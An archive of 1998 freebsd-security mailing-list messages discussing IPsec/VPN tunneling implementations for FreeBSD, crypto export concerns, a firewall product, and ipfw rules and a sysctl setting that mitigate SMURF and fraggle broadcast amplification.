19:19:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.atipa.com (altrox.atipa.com [208.128.22.34]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id TAA03877 for ; Wed, 27 May 1998 19:18:46 -0700 (PDT) (envelope-from freebsd@atipa.com) Received: (qmail 28083 invoked by uid 1017); 28 May 1998 01:16:03 -0000 Date: Wed, 27 May 1998 19:16:03 -0600 (MDT) From: Atipa To: angelos@dsl.cis.upenn.edu, jkh@time.cdrom.com cc: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: FreeBSD Tunneling In-Reply-To: <199805272309.TAA15065@adk.gr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ ... w.r.t Photuris/IPsec/vpn ... ] Angelos writes: > I use it all the time, but then I'm one of the coders. Expect a > FreeBSD port in the next few weeks (unfortunately available only to US > citizens). Well, I think those last bits to the FreeBSD code should be completed in South Africa, and distributed from there :) Jordan mentioned to me that Walnut Creek is in some sort of crypto-law-exempt region or something, and FreeBSD can use full-strength crypto. Jordan, care to explain? This would be a big loss to FreeBSD if this technology goes non-exportable! > >I also agree that the lack of documentation is a huge drawback. There is no > >continuity between segments. :( > Yes, but noone likes writing docs (never mind good ones) :-) Well, if you help me figure it out, I'll write the docs. I'll wait for the FreeBSD port (no OpenBSD machines in use now, and I like FreeBSD better!), but I'd be happy to contribute. > >What do you recommend for FreeBSD then? SKIP, ssh/ppp, ??? > > Well, wait for the port. I don't like the SKIP design and philosophy > (except for multicast communications), and I think ssh/ppp is a > horrible hack. Agreed on both accounts. Keep in touch w/ me if you want testers, etc. Kevin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 20:00:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12059 for freebsd-security-outgoing; Wed, 27 May 1998 20:00:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11841 for ; Wed, 27 May 1998 20:00:20 -0700 (PDT) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id WAA26477; Wed, 27 May 1998 22:54:05 -0400 (EDT) Date: Wed, 27 May 1998 22:59:44 -0400 (EDT) From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: Atipa cc: angelos@dsl.cis.upenn.edu, jkh@time.cdrom.com, freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Wed, 27 May 1998, Atipa wrote: > Well, I think those last bits to the FreeBSD code should be completed in > South Africa, and distributed from there :) I second this! > Jordan mentioned to me that Walnut Creek is in some sort of > crypto-law-exempt region or something, and FreeBSD can use full-strength > crypto. Jordan, care to explain? This would be a big loss to FreeBSD if > this technology goes non-exportable! I was not aware of that hmm. > Well, if you help me figure it out, I'll write the docs. I'll wait for the > FreeBSD port (no OpenBSD machines in use now, and I like FreeBSD better!), > but I'd be happy to contribute. I was going to write a section in the handbook for SKIP once I got it working but im quite convinced SKIP sucks, and while no one likes writing doc's I have seen more documentation on "undocumented" kernel options thatn SKIP. Im sure once its working it is probably nice, but I think the implementation must be piss poor if so many people are finding it impossible to get configured. > Agreed on both accounts. Keep in touch w/ me if you want testers, etc. I'd be happy to test it as well. Chris -- "I don't do favors, I accumulate debts" ===================================| Open Systems Networking And Consulting. FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 -----------------------------------| 1402 N. Washington, Wellington, KS-67152 FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting-Network Engineering-Security ===================================| http://open-systems.net -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzPemUsAAAEH/06iF0BU8pMtdLJrxp/lLk3vg9QJCHajsd25gYtR8X1Px1Te gWU0C4EwMh4seDIgK9bzFmjjlZOEgS9zEgia28xDgeluQjuuMyUFJ58MzRlC2ONC foYIZsFyIqdjEOCBdfhH5bmgB5/+L5bjDK6lNdqD8OAhtC4Xnc1UxAKq3oUgVD/Z d5UJXU2xm+f08WwGZIUcbGcaonRC/6Z/5o8YpLVBpcFeLtKW5WwGhEMxl9WDZ3Kb NZH6bx15WiB2Q/gZQib3ZXhe1xEgRP+p6BnvF364I/To9kMduHpJKU97PH3dU7Mv CXk2NG3rtOgLTEwLyvtBPqLnbx35E0JnZc0k5YkABRO0JU9wZW4gU3lzdGVtcyA8 b3BzeXNAb3Blbi1zeXN0ZW1zLm5ldD4= =BBjp -----END PGP PUBLIC KEY BLOCK----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 20:01:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12080 for freebsd-security-outgoing; Wed, 27 May 1998 20:01:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11965 for ; Wed, 27 May 1998 20:00:42 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id UAA08173; Wed, 27 May 1998 20:00:51 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: Atipa cc: angelos@dsl.cis.upenn.edu, Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling In-reply-to: Your message of "Wed, 27 May 1998 19:16:03 MDT." Date: Wed, 27 May 1998 20:00:51 -0700 Message-ID: <8169.896324451@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > Jordan mentioned to me that Walnut Creek is in some sort of > crypto-law-exempt region or something, and FreeBSD can use full-strength > crypto. Jordan, care to explain? This would be a big loss to FreeBSD if > this technology goes non-exportable! I wouldn't worry too much about this. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 20:07:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA13544 for freebsd-security-outgoing; Wed, 27 May 1998 20:07:39 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.atipa.com (altrox.atipa.com [208.128.22.34]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id UAA13202 for ; Wed, 27 May 1998 20:06:20 -0700 (PDT) (envelope-from freebsd@atipa.com) Received: (qmail 28325 invoked by uid 1017); 28 May 1998 02:03:32 -0000 Date: Wed, 27 May 1998 20:03:32 -0600 (MDT) From: Atipa To: "Jordan K. Hubbard" cc: angelos@dsl.cis.upenn.edu, Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling In-Reply-To: <8169.896324451@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > > Jordan mentioned to me that Walnut Creek is in some sort of > > crypto-law-exempt region or something, and FreeBSD can use full-strength > > crypto. Jordan, care to explain? This would be a big loss to FreeBSD if > > this technology goes non-exportable! > > I wouldn't worry too much about this. If you have an authoritative coder saying "this will not be available outside the US", I would worry, or explain to him/her why one should not. I myself would like to know why we need not worry. Kevin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 21:12:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA22560 for freebsd-security-outgoing; Wed, 27 May 1998 21:12:26 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from passer.osg.gov.bc.ca (0@passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA22493 for ; Wed, 27 May 1998 21:12:13 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id VAA03184; Wed, 27 May 1998 21:12:10 -0700 (PDT) Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by passer.osg.gov.bc.ca, id smtpdaakspa; Wed May 27 21:11:59 1998 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.0/8.6.10) id VAA07122; Wed, 27 May 1998 21:11:49 -0700 (PDT) Message-Id: <199805280411.VAA07122@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdWQ7110; Wed May 27 21:11:40 1998 X-Mailer: exmh version 2.0.2 2/24/98 Reply-to: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: cy To: Cy Schubert - ITSD Open Systems Group cc: Bart Smit , "J.A. Terranson" , "'FreeBSD Security'" Subject: Re: SMURF in 2.2.5 In-reply-to: Your message of "Wed, 27 May 1998 09:22:50 PDT." <199805271623.JAA05578@passer.osg.gov.bc.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 27 May 1998 21:11:39 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > > > > On Wed, 27 May 1998, J.A. Terranson wrote: > > > > > I will not report this to bugtraq untill you guys tell me there's > > > a patch... > > > > Well, sysctl -w net.inet.icmp.bmcastecho=0 does not help, contrary to > > what you'd expect from the advisory... > > What about ipfw? For example, where 123.123.123.0 is your network > address, > > ipfw add deny icmp from 123.123.123.0 to any > ipfw add deny icmp from 123.123.123.255 to any It looks like I've been a little dyslexic in my previos post. This should have been, ipfw add deny icmp from any to 123.123.123.255 To circumvent the fraggle (UDP) attack, ipfw add deny udp from any to 123.123.123.255 This has the added benefit of denying not only broadcast icmp (and udp) packets that are destined in but also broadcast icmp (and udp) packets destined out as well. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 01:32:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA29588 for freebsd-security-outgoing; Thu, 28 May 1998 01:32:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from citadel.cdsec.com (citadel.cdsec.com [192.96.22.18]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA29541 for ; Thu, 28 May 1998 01:32:22 -0700 (PDT) (envelope-from ian@cdsec.com) Received: (from nobody@localhost) by citadel.cdsec.com (8.8.5/8.6.9) id KAA25274; Thu, 28 May 1998 10:38:53 +0200 (SAT) Received: by citadel via recvmail id 25231; Thu May 28 10:38:23 1998 From: Ian Cooper Message-Id: <199805280830.KAA24639@cdsec.com> Subject: Re: FreeBSD Tunneling To: freebsd@atipa.com (Atipa) Date: Thu, 28 May 1998 10:30:35 +0200 (SAT) Cc: freebsd-security@FreeBSD.ORG, opsys@mail.webspan.net In-Reply-To: from "Atipa" at May 27, 98 08:03:32 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > > On Wed, 27 May 1998, Atipa wrote: > > > Well, I think those last bits to the FreeBSD code should be completed in > > South Africa, and distributed from there :) > > I second this! We're presently debugging and extending the WIDE IPSEC implementation to do tunnel mode, and this IS being done in South Africa :) The WIDE implementation, IMHO is a pretty clean one, and since it is inherently a FreeBSD implementation rather than a port, I'd suggest that it be considered as a strong candidate for the "official" implementation. We also have plans for an ISAKMP implementation. If others volunteer to do some of the non-crypto ISAKMP stuff, then we can do the crypto part and that would speed up the availability of isakmp. Ian > > > Jordan mentioned to me that Walnut Creek is in some sort of > > crypto-law-exempt region or something, and FreeBSD can use full-strength > > crypto. Jordan, care to explain? This would be a big loss to FreeBSD if > > this technology goes non-exportable! > > I was not aware of that hmm. > > > Well, if you help me figure it out, I'll write the docs. I'll wait for the > > FreeBSD port (no OpenBSD machines in use now, and I like FreeBSD better!), > > but I'd be happy to contribute. > > I was going to write a section in the handbook for SKIP once I got it > working but im quite convinced SKIP sucks, and while no one likes writing > doc's I have seen more documentation on "undocumented" kernel options > thatn SKIP. Im sure once its working it is probably nice, but I think the > implementation must be piss poor if so many people are finding it > impossible to get configured. > > > Agreed on both accounts. Keep in touch w/ me if you want testers, etc. > > I'd be happy to test it as well. > > Chris > > -- > "I don't do favors, I accumulate debts" > > ===================================| Open Systems Networking And Consulting. > FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 > -----------------------------------| 1402 N. Washington, Wellington, KS-67152 > FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net > http://www.freebsd.org | Consulting-Network Engineering-Security > ===================================| http://open-systems.net > > -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.6.2 > > mQENAzPemUsAAAEH/06iF0BU8pMtdLJrxp/lLk3vg9QJCHajsd25gYtR8X1Px1Te > gWU0C4EwMh4seDIgK9bzFmjjlZOEgS9zEgia28xDgeluQjuuMyUFJ58MzRlC2ONC > foYIZsFyIqdjEOCBdfhH5bmgB5/+L5bjDK6lNdqD8OAhtC4Xnc1UxAKq3oUgVD/Z > d5UJXU2xm+f08WwGZIUcbGcaonRC/6Z/5o8YpLVBpcFeLtKW5WwGhEMxl9WDZ3Kb > NZH6bx15WiB2Q/gZQib3ZXhe1xEgRP+p6BnvF364I/To9kMduHpJKU97PH3dU7Mv > CXk2NG3rtOgLTEwLyvtBPqLnbx35E0JnZc0k5YkABRO0JU9wZW4gU3lzdGVtcyA8 > b3BzeXNAb3Blbi1zeXN0ZW1zLm5ldD4= > =BBjp > -----END PGP PUBLIC KEY BLOCK----- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > -- Ian Cooper (ian@cdsec.com) Tel: +27 21 23-6065 Citadel Data Security Fax: +27 21 24-3656 Citadel Firewall, Citadel VPN Router Unit 3, 46 Orange Street http://www.cdsec.com Cape Town, South Africa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 01:48:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA03369 for freebsd-security-outgoing; Thu, 28 May 1998 01:48:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA03325 for ; Thu, 28 May 1998 01:48:38 -0700 (PDT) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id EAA17083; Thu, 28 May 1998 04:42:48 -0400 (EDT) Date: Thu, 28 May 1998 04:48:27 -0400 (EDT) From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: Ian Cooper cc: Atipa , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling In-Reply-To: <199805280830.KAA24639@cdsec.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Thu, 28 May 1998, Ian Cooper wrote: > We're presently debugging and extending the WIDE IPSEC implementation > to do tunnel mode, and this IS being done in South Africa :) WooWoo!! All I ask is that it works and works as the instructions say :) SKIP has left a bitter taste in my mouth now when I hear the word "tunnel" or "vpn" :) > The WIDE implementation, IMHO is a pretty clean one, and since it > is inherently a FreeBSD implementation rather than a port, I'd > suggest that it be considered as a strong candidate for the "official" > implementation. Let the best Stack win :) > We also have plans for an ISAKMP implementation. If others volunteer > to do some of the non-crypto ISAKMP stuff, then we can do the crypto > part and that would speed up the availability of isakmp. > http://www.cdsec.com Cape Town, South Africa Oh and BTW, I just checked out your compan page. WHY is your firewall not listed under software in teh commercial vendors section??? I thought AKER was the only FreeBSD firewall solution (commercial) but I can't use them because they dont have an english version, and that wouldnt go over to well with my clients :) They would be lost. This NEEDS to be listed in the commercial vendors section under software. I'm adding it to my company pages soon as a firewall solution. I will use your solution in my next big project in a few months. BTW I didnt see this listed which probably means no, but do you have an X GUI in addtion to the windows GUI for configuring it? Chris -- "I don't do favors, I accumulate debts" ===================================| Open Systems Networking And Consulting. FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 -----------------------------------| 1402 N. Washington, Wellington, KS-67152 FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting-Network Engineering-Security ===================================| http://open-systems.net -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzPemUsAAAEH/06iF0BU8pMtdLJrxp/lLk3vg9QJCHajsd25gYtR8X1Px1Te gWU0C4EwMh4seDIgK9bzFmjjlZOEgS9zEgia28xDgeluQjuuMyUFJ58MzRlC2ONC foYIZsFyIqdjEOCBdfhH5bmgB5/+L5bjDK6lNdqD8OAhtC4Xnc1UxAKq3oUgVD/Z d5UJXU2xm+f08WwGZIUcbGcaonRC/6Z/5o8YpLVBpcFeLtKW5WwGhEMxl9WDZ3Kb NZH6bx15WiB2Q/gZQib3ZXhe1xEgRP+p6BnvF364I/To9kMduHpJKU97PH3dU7Mv CXk2NG3rtOgLTEwLyvtBPqLnbx35E0JnZc0k5YkABRO0JU9wZW4gU3lzdGVtcyA8 b3BzeXNAb3Blbi1zeXN0ZW1zLm5ldD4= =BBjp -----END PGP PUBLIC KEY BLOCK----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 02:05:14 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA04839 for freebsd-security-outgoing; Thu, 28 May 1998 02:05:14 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from citadel.cdsec.com (citadel.cdsec.com [192.96.22.18]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA04699 for ; Thu, 28 May 1998 02:03:00 -0700 (PDT) (envelope-from ian@cdsec.com) Received: (from nobody@localhost) by citadel.cdsec.com (8.8.5/8.6.9) id LAA26554; Thu, 28 May 1998 11:09:53 +0200 (SAT) Received: by citadel via recvmail id 26509; Thu May 28 11:08:54 1998 From: Ian Cooper Message-Id: <199805280901.LAA26511@cdsec.com> Subject: Re: FreeBSD Tunneling To: opsys@mail.webspan.net (Open Systems Networking) Date: Thu, 28 May 1998 11:01:05 +0200 (SAT) Cc: freebsd@atipa.com, freebsd-security@FreeBSD.ORG In-Reply-To: from "Open Systems Networking" at May 28, 98 04:48:27 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > > On Thu, 28 May 1998, Ian Cooper wrote: > > > We're presently debugging and extending the WIDE IPSEC implementation > > to do tunnel mode, and this IS being done in South Africa :) > > WooWoo!! All I ask is that it works and works as the instructions say :) > SKIP has left a bitter taste in my mouth now when I hear the word "tunnel" > or "vpn" :) > > > The WIDE implementation, IMHO is a pretty clean one, and since it > > is inherently a FreeBSD implementation rather than a port, I'd > > suggest that it be considered as a strong candidate for the "official" > > implementation. > > Let the best Stack win :) > > > We also have plans for an ISAKMP implementation. If others volunteer > > to do some of the non-crypto ISAKMP stuff, then we can do the crypto > > part and that would speed up the availability of isakmp. > > > http://www.cdsec.com Cape Town, South Africa > > Oh and BTW, I just checked out your compan page. WHY is your firewall not > listed under software in teh commercial vendors section??? Ooops - nasty omission there on our part :( I think we should sort this out asap. > > I thought AKER was the only FreeBSD firewall solution (commercial) but I > can't use them because they dont have an english version, and that wouldnt > go over to well with my clients :) They would be lost. > This NEEDS to be listed in the commercial vendors section under software. > I'm adding it to my company pages soon as a firewall solution. Tx - obliged... > > I will use your solution in my next big project in a few months. > BTW I didnt see this listed which probably means no, but do you have an X > GUI in addtion to the windows GUI for configuring it? Nope - no X config. We think X on a firewall is a bad idea. There is a text mode interface which is a real no-brainer to use (function keys, tabbing between data fields, etc.). The manual is online on our web pages, and there should be some screen shots on the man pages. > > Chris > > -- > "I don't do favors, I accumulate debts" > > ===================================| Open Systems Networking And Consulting. > FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 > -----------------------------------| 1402 N. Washington, Wellington, KS-67152 > FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net > http://www.freebsd.org | Consulting-Network Engineering-Security > ===================================| http://open-systems.net > > -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.6.2 > > mQENAzPemUsAAAEH/06iF0BU8pMtdLJrxp/lLk3vg9QJCHajsd25gYtR8X1Px1Te > gWU0C4EwMh4seDIgK9bzFmjjlZOEgS9zEgia28xDgeluQjuuMyUFJ58MzRlC2ONC > foYIZsFyIqdjEOCBdfhH5bmgB5/+L5bjDK6lNdqD8OAhtC4Xnc1UxAKq3oUgVD/Z > d5UJXU2xm+f08WwGZIUcbGcaonRC/6Z/5o8YpLVBpcFeLtKW5WwGhEMxl9WDZ3Kb > NZH6bx15WiB2Q/gZQib3ZXhe1xEgRP+p6BnvF364I/To9kMduHpJKU97PH3dU7Mv > CXk2NG3rtOgLTEwLyvtBPqLnbx35E0JnZc0k5YkABRO0JU9wZW4gU3lzdGVtcyA8 > b3BzeXNAb3Blbi1zeXN0ZW1zLm5ldD4= > =BBjp > -----END PGP PUBLIC KEY BLOCK----- > > -- Ian Cooper (ian@cdsec.com) Tel: +27 21 23-6065 Citadel Data Security Fax: +27 21 24-3656 Citadel Firewall, Citadel VPN Router Unit 3, 46 Orange Street http://www.cdsec.com Cape Town, South Africa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 07:18:54 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA20487 for freebsd-security-outgoing; Thu, 28 May 1998 07:18:54 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from chudich.co.rmit.edu.au (chudich.co.rmit.EDU.AU [131.170.32.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA20437 for ; Thu, 28 May 1998 07:18:44 -0700 (PDT) (envelope-from s9507886@tuan.cse.rmit.EDU.AU) Received: from dropbear.cse.rmit.EDU.AU (s9507886@dropbear.cse.rmit.EDU.AU [131.170.118.20]) by chudich.co.rmit.edu.au (8.8.8/8.8.8) with ESMTP id AAA01821; Fri, 29 May 1998 00:18:43 +1000 (EST) Received: (s9507886@localhost) by dropbear.cse.rmit.EDU.AU (8.8.5/8.6.12) id AAA08628; Fri, 29 May 1998 00:14:44 +1000 (EST) Date: Fri, 29 May 1998 00:14:44 +1000 (EST) Message-Id: <199805281414.AAA08628@dropbear.cse.rmit.EDU.AU> From: Tony Alexander Frank To: andrew@squiz.co.nz CC: sysadmin@mfn.org, freebsd-security@FreeBSD.ORG In-reply-to: (andrew@squiz.co.nz) Subject: Re: Possible DoS opportunity via ping implementation error? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Hi, > >I had a very interesting day today! I found out that FBSD (2.2.5R) > >machines will > >always respond to a broadcasted echo request. For example: > This contradicts the CERT Advisory below which states that FreeBSD does not > have the problem. > > Either the CERT report is wrong, a problem has been introduced since, or > it's specific to the way you've set up your boxes. > > I'd like to know which. Well, this occurs on my 2.2.5-RELEASE and 2.2.6-RELEASE machines here. Nothing fancy done to either box, the install was straight off the Walnut Creek 2.2.5 disc set, and the 2.2.6 was done over the net. Both have default values in regards to TCP/IP and just about everything else. As such, I would tend to suggest that while the CERT report might be accurate, by default this 'feature' is enabled... > >FreeBSD, Inc. > >============= > >In FreeBSD 2.2.5 and up, the tcp/ip stack does not respond to icmp > >echo requests destined to broadcast and multicast addresses by default. This > >behaviour can be changed via the sysctl command via > >mib net.inet.icmp.bmcastecho. ivanova$ sysctl net.inet.icmp.bmcastecho net.inet.icmp.bmcastecho: 1 ivanova$ uname -r 2.2.5-RELEASE ivanova$ Hope it helps? Regards, Tony Frank To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 08:22:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA28372 for freebsd-security-outgoing; Thu, 28 May 1998 08:22:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mixcom.mixcom.com (daemon@mixcom.mixcom.com [198.137.186.100]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id IAA28365 for ; Thu, 28 May 1998 08:22:04 -0700 (PDT) (envelope-from sysop@mixcom.com) Received: by mixcom.mixcom.com (8.6.12/2.2) id KAA20432; Thu, 28 May 1998 10:24:12 -0500 Received: from mix-nt.mixcom.com(198.137.186.7) by mixcom.mixcom.com via smap (V1.3) id sma020417; Thu May 28 10:23:58 1998 Message-ID: <001001bd8a4c$5ed225a0$07ba89c6@mix-nt.mixcom.com> From: "Sysop" To: Subject: unsubscribe Date: Thu, 28 May 1998 10:22:04 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2106.4 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 10:55:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA17583 for freebsd-security-outgoing; Thu, 28 May 1998 10:55:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adk.gr (COREDUMP.CIS.UPENN.EDU [158.130.6.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA17557 for ; Thu, 28 May 1998 10:55:08 -0700 (PDT) (envelope-from angelos@dsl.cis.upenn.edu) Received: from dsl.cis.upenn.edu (localhost [127.0.0.1]) by adk.gr (8.8.8/8.8.5) with ESMTP id NAA23696; Thu, 28 May 1998 13:54:16 -0400 (EDT) Message-Id: <199805281754.NAA23696@adk.gr> To: Open Systems Networking Cc: Ian Cooper , Atipa , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling In-reply-to: Your message of "Thu, 28 May 1998 04:48:27 EDT." Date: Thu, 28 May 1998 13:54:16 -0400 From: "Angelos D. Keromytis" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- To: Open Systems Networking Subject: Re: FreeBSD Tunneling Cc: Ian Cooper , Atipa , Date: 05/28/98, 13:54:15 In message , Open S ystems Networking writes: > >> The WIDE implementation, IMHO is a pretty clean one, and since it I surely hope you're not implying otherwise for certain other implementations :-) >> is inherently a FreeBSD implementation rather than a port, I'd >> suggest that it be considered as a strong candidate for the "official" >> implementation. Um. Maybe I wasn't clear. We're not quite aiming at becoming a/the "official" implementation. If people think the port's useful, they'll use it; if it's extremely useful, maybe it will be integrated in the kernel. Ditto for the WIDE code. If the latter happens, we'll interop against it. I've only briefly looked in the distant past at the WIDE code. It was good code (I usually have trouble reading code written in Japan), but rather incomplete in the features it supported (things may have changed). In any case, I'd urge you to try and interoperate with OpenBSD post-2.3 IPsec, since we've done major interoperability testing with many other (commercial) vendors. An amusing detail: the OpenBSD IPsec was originally writen for BSD/OS (by John Ioannidis), then ported to NetBSD (by me), and then moved to OpenBSD (by Niels Provos and me). So we'd like to claim that we've gone through all the BSDs :-) >Let the best Stack win :) Sorry, not a contest :-) >> We also have plans for an ISAKMP implementation. If others volunteer >> to do some of the non-crypto ISAKMP stuff, then we can do the crypto >> part and that would speed up the availability of isakmp. Hm. There is one free implementation of ISAKMP/Oakley (now called IKE), named pluto. Written originally by yours truly, it's now being supported by the FreeSWAN project (I forget the URL, mailing list is linux-ipsec@clinet.fi, usual majordomo to subscribe). Unfortunately, that code is under GPL (yes, I know, but I was young and needed the money...err...). It's also horrible (250KB speed-written in 3 weeks, to meet a deadline), but it's more or less free (modulo GPL), outside the US (written in Greece, supported by people in Canada), and there is some support. AFAIK it's the only one with these properties (yes, even the horrible code :-) The FreeSWAN project is Linux-oriented, but pluto was written on OpenBSD (and should be trivially portable), and there's quite a bit of cooperation between them and the OpenBSD IPsec group. I'll shut up now. - -Angelos PS. Found the URL, it's http://www.xs4all.nl/~freeswan/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBNW2kx70pBjh2h1kFAQHkwgQAkNw6RrLbhPga9kLH3MITs0tq8l5ItGfI HP/Qu8Z42dhOGQivvYbEH8uPRZiJmP7iMNNKyZd7U1tcEpcr2OYKOns8jqaSdnIf 